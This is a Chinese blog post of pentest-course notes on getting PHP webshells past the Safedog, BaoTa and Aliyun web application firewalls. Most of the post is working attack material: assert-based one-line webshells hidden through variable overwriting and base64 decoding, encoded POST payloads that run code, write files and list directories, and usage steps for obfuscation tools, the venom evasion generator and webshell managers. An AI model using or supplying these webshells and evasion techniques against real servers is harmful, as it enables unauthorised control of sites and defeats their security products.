48:WAF绕过-权限控制之代码混淆及行为造轮子

已于 2022-05-09 12:34:03 修改
阅读量237 收藏 2
点赞数
分类专栏: 小迪笔记 # 过waf 文章标签: 安全 web安全 php
于 2022-05-07 20:21:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/124635726
版权

本文为复现笔记,侵删
(https://www.cnblogs.com/zhengna/p/15133613.html)

文章目录

思维导图

img

Safedog代码层手写及脚本绕过

  • 变量覆盖,加密混淆,异或生成

BT Aliyun代码层手写及脚本绕过

  • 编码解码(变量覆盖,加密混淆,异或生成)

ASP,PHP,ASPX,JSP,PY等后门免杀同理

先绕安全狗–>安全狗加BT–>安全狗加BT加Aliyun,三者依次测试

案例1:Safedog-手写覆盖变量简易代码绕过-代码层

一句话木马:<?php assert($_POST['chopper']);?>
 
变量覆盖:通过把敏感字符写到参数上,绕过WAF<?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b($_POST['z']);
?>
 
//传参:?x=b&y=assert
//$a=b  $$a=assert=$b assert($_POST['z']);
 
可以绕过safedog查杀
  
上传成功后,
访问:http://127.0.0.1:8081/x/1.php?x=b&y=assert
并且(可以用hackbar插件)postdata: z=phpinfo();

safedog不拦截

测试,成功。

在这里插入图片描述

案例2:Safedog,BT,Aliyun-基于 覆盖变量 编码解码 绕过-代码层

采取上述覆盖变量的方式可以绕过安全狗查杀,但是会被宝塔拦截。原因是 宝塔过滤规则里定义了phpinfo()等关键字

img

所以可以配套 使用编码解码方式 绕过 宝塔(过滤规则phpinfo等)。

一句话木马:<br><?php
$a=$_GET['x'];
$$a=$_GET['y'];
$b(base64_decode($_POST['z']));
?>
 
上传成功后,
访问:http://127.0.0.1:8081/x/1.php?x=b&y=assert
并且(可以用hackbar插件)postdata: z=cGhwaW5mbygpOw==

测试,成功。

在这里插入图片描述

案例3:Safedog-基于接口类加密混淆代码绕过-代码层

上传一句话木马:

<?php assert(base64_decode($_POST['x']));?>

木马文件被安全狗查杀

img

访问被安全狗拦截

img

可以采用加密混淆的方法绕过

方法1:使用enPHP工具加密混淆代码

enPHP:一个开源加密混淆 PHP 代码项目
 
源码地址:https://github.com/djunny/enphp
命令:php.exe code_test.php
 
在线地址:http://enphp.djunny.com/(要挂v才能访问)

在这里插入图片描述

加密混淆后木马:

img

测试,成功。

在这里插入图片描述

方法2:phpjiami在线加密混淆

地址:https://www.phpjiami.com/phpjiami.html
在这里插入图片描述
木马加密前后对比:
在这里插入图片描述

img

测试,成功。

在这里插入图片描述

案例4:safedog,BT,Aliyun-基于覆盖加密变异下编码解码绕过-代码层

venom:支持生成asp、aspx、jsp、php等一句话免杀木马

  • 下载:https://pan.baidu.com/s/1msqO2kps139NNP9ZEIAVHw 提取码:xiao
  • 这个项目原来在github上,后来被移除了。发现gitee上也有Webshell-venom,
  • 地址:https://gitee.com/Dyan_code/webshell-venom?_from=gitee_search

使用方法

python3 php_venom_3.3.py    //生成免杀一句话
 
python3 php_venom_3.3.py shell.php   //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php

在这里插入图片描述

3.x 使用说明:

是否传入id参数决定是否把流量编码

http://www.xxx.com/shell.php 
POST: mr6=phpinfo();  //与普通shell相同

http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo=  //payload的base64编码

img

测试,成功。

在这里插入图片描述有id 的
在这里插入图片描述

案例5:Safedog,BT,Aliyun-基于冰蝎新型控制器绕过全面测试-行为层

3个工具比较:

小迪师傅的个人打分

  • 菜刀:已经不再更新了,无插件(看举例1),单向加密传输,打5分,不建议使用。
  • 蚁剑:持续更新状态,有插件,扩展性强,缺点是单向加密传输,打8分。
  • 冰蝎:持续更新状态,未知插件,扩展性强,双向加密传输,偏向于后渗透,可以联动msf.,打分9分,推荐使用。

下载地址:

  • 冰蝎:https://github.com/rebeyond/Behinder/releases/
  • 蚁剑:https://github.com/AntSwordProject/antSword/releases

举例1:菜刀工具没有base64编码解码功能,所以就无法通过编码绕过宝塔,但是蚁剑可以,如下图所示。

在这里插入图片描述

img

单向加密传输VS双向加密传输:

  • 单向加密传输:请求参数加密,响应不加密。
  • 双向加密传输:请求加密,响应加密,更好地保护数据传输,防止waf拦截被杀。

冰蝎双向加密传输原理:

img

冰蝎-双向加密传输-抓包查看

用冰蝎 http代理测试,burp开8080 端口
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

案例6:Safedog,BT,Aliyun-基于手写新型控制器绕过全面测试-行为层

使用工具连接木马时,waf可能会通过工具的指纹实现拦截,此时我们可以采用如下方法绕过:1、指纹变异、2、自己造轮子

举例如下,自己写脚本模拟工具
在这里插入图片描述

http://test.xxx.com/xx.php?x=b&y=assert
post data举例:
执行代码 z=phpinfo(); -->  z=cGhwaW5mbygpOw==
写入文件 z=file_put_contents("test.txt","1"); -->  z=ZmlsZV9wdXRfY29udGVudHMoInRlc3QudHh0IiwiMSIpOw==
读取文件 z=var_dump(scandir(".")); -->  z=dmFyX2R1bXAoc2NhbmRpcigiLiIpKTs=

在这里插入图片描述

img在这里插入图片描述

测试,成功。

img

涉及其他资源:

1、wsexplorer抓包工具
在这里插入图片描述

img

2、超级加解密转换工具

img

感兴趣的可以去下载试试。

明月清风~~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
48天:WAF绕过-权限控制代码混淆行为轮子1
08-03
WAF 绕过-权限控制代码混淆行为轮子#Safedog 代码层手写及脚本绕过变量覆盖,加密混淆,异或生成#BT Aliyun 代码层手写及脚本绕过编码解码
移动端页面px布局适配方案(viewport)
热门推荐
凌晨不睡觉
08-02 15万+
通过 <meta name="viewport"> 给视口设置固定的宽度,浏览器对页面自动缩放来实现页面的适配效果 优点是可以使用px布局,不用额外进行rem或者vw等等单位的换算了...
WAF绕过-权限控制代码混淆行为轮子
Rnan_prince的博客
08-05 293
免责声明:本内容仅为【小迪安全-web渗透测试】的学习笔记,仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为成的后果与本文作者无关。 Safedog代码层手写及脚本绕过 变量覆盖,加密混淆,异或生成 BT Aliyun代码层手写及脚本绕过 编码解码(变量覆盖,加密混淆,异或生成) ASP,PHP,ASPX,JSP,PY等后门免杀同理 http://test.xxx.com/x.php?id=x mr6=cGhwaW5mbygpOw== http://te..
PHP代码注入基础
lhix_的博客
11-30 425
PHP代码注入基础漏洞原因相关函数及语句evalassertpreg_replacecall_user_fun动态函数`$a($b)`漏洞应用OS命令注入命令执行的常见函数systemexecshell_execpassthru反引号``漏洞利用 漏洞原因 漏洞原因:程序中有可执行的PHP代码的函数或语言结构,传入的参数客户端可以进行控制。 相关函数及语句 eval eval(); 会将字符串当作PHP代码执行。 例: <?php $_str=$_GET['code']; eval($str); ?&
上传脚本文件(一句话后门)WAF绕过(php)
weixin_43916797的博客
07-11 254
变量覆盖、 1.变量覆盖 要上传的脚本: <?php $a = $_GET['x']; $$a = $_GET['y']; $b(base64_decode($_POST['z'])); > phpinfo();转为base64为:cGhwaW5mbygpOw== url为:www.xxx.com?x=b&y=assert 传入的data: x= cGhwaW5mbygpOw== 2.加密混淆 将脚本文件加密 加密连接:http://phpjiami.com/phpjiami.html
简单手写后门Safedog检测绕过
永远是少年
01-31 1900
今天继续给大家介绍渗透测试相关知识,本文主要内容是简单手写后门Safedog检测绕过。 一、Safedog后门扫描原理 二、Safedog后门扫描绕过
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
第46天:WAF绕过-信息收集之反爬虫延时代理池技术1
08-03
WAF 绕过-信息收集之反爬虫延时代理池技术#简要本章具体内容和安排缘由#简要本课具体内容和讲课思路#简要本课简要知识点和具体说明演示案例:Safedog-默认
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
WEB 漏洞-SQL 注入之堆叠及 WAF 绕过注入 SQL 注入是一种常见的 WEB 漏洞攻击方式,通过将恶意 SQL 语句嵌入到 Web 应用程序的输入参数中,从而访问、修改或控制数据库的数据。堆叠注入(Stacked Injections)是 ...
第24天:WEB漏洞-文件上传之WAF绕过安全修复1
08-03
Content-Disposition:一般可更改name:表单参数值,不能更改filename:文件名,可以更改Content-Type:文件 MIME,视情
VPS拨号服务器:独享的高效与安全
qq_34245974的博客
07-06 668
本文将深入探讨VPS拨号服务器的独享特性,以及它如何提供更高效的服务和更强的安全保障。总之,VPS拨号服务器的独享特性为用户提供了一个高效、安全且灵活的网络环境,特别适合那些对服务器性能和安全性有高要求的业务需求。随着技术的不断进步,我们有理由相信,VPS拨号服务器将在未来的互联网架构中扮演越来越重要的角色。VPS拨号服务器是一种特殊的服务器,它结合了传统的VPS功能与动态IP地址分配能力。数据隔离:独享服务器保证了数据的隔离性,降低了数据泄露的风险。自定义安全策略:可以根据业务需求实施定制化的安全措施。
移动互联安全扩展要求测评项
hakksjss的博客
07-10 811
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 943
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
[图解]SysML和EA建模住宅安全系统-11-接口块
rolt的专栏
07-06 1002
当然内部块图里面肯定要比这个丰富
【知网CNKI-注册安全分析报告】
07-08 1436
知网作为全国学术界、教育界、出版界、图书情报界的共享平台,打是国家基础设施,由于收费过高导致很多单位苦知网已经,名符其实的垄断行业,赚的盆满钵满的, 按理技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
最新发布
运维人生
07-10 337
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
等保测评与数据保护:确保敏感信息在数字化转型中的安全传输与存储
A526847的博客
07-07 962
随着数字化转型的加速推进,企业正以前所未有的速度将业务迁移到云端,利用大数据、人工智能、物联网等先进技术提升运营效率和服务质量。然而,这一过程中,敏感信息的传输与存储安全成为了企业面临的重大挑战。信息安全等级保护(简称“等保”)作为保障信息系统安全的重要机制,与数据保护策略紧密结合,共同构筑起一道坚不可摧的安全防线,确保敏感信息在数字化转型中的安全无忧。
了解安全端口
2301_79955948的博客
07-08 1017
涉及系统环境(如操作系统信息、网络架构信息、组网结构等)、应用系统(如应用系统的详细信息、版本信息等)、数据库(如数据库类型、版本、存储方式等)、存储设备(如存储设备类型、版本、存储技术等)、安全设备(如服务器、防火墙、IDS/IPS等)、安全管理和应急响应体系(如安全管理制度、应急预案等)。因此,在进行等保测评前,最好与当地的测评机构或相关部门进行沟通,明确所需的具体材料。:通过等保测评证明企业对数据和客户信息安全的重视,有助于树立良好的企业形象,增强合作伙伴及公众的信任度,促进业务的持续健康发展。
CobaltStrike的内网安全
8888的博客
07-05 1240
介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以启动服务端,首先创建一个监听(注意,这里要关闭kali的Apache服务,要不然端口占用创建监听不成功)payload选择Beacon HTTP ,HTTP Hosts选择服务器的IP点击save接着我们用CS生成一个payload(Windows exe),使得我靶机上线:Lisrener选择我们创建的监听服务,点击Launch。
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
sqlmap 进行注入测试,使用的 tamper 脚本是"apostrophemask",其作用是将注入的单引号转义为 unicode 编码,绕过程序自身的过滤。在 sqlmap 的命令行中,加入"--tamper=apostrophemask"即可调用该脚本。 接下来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值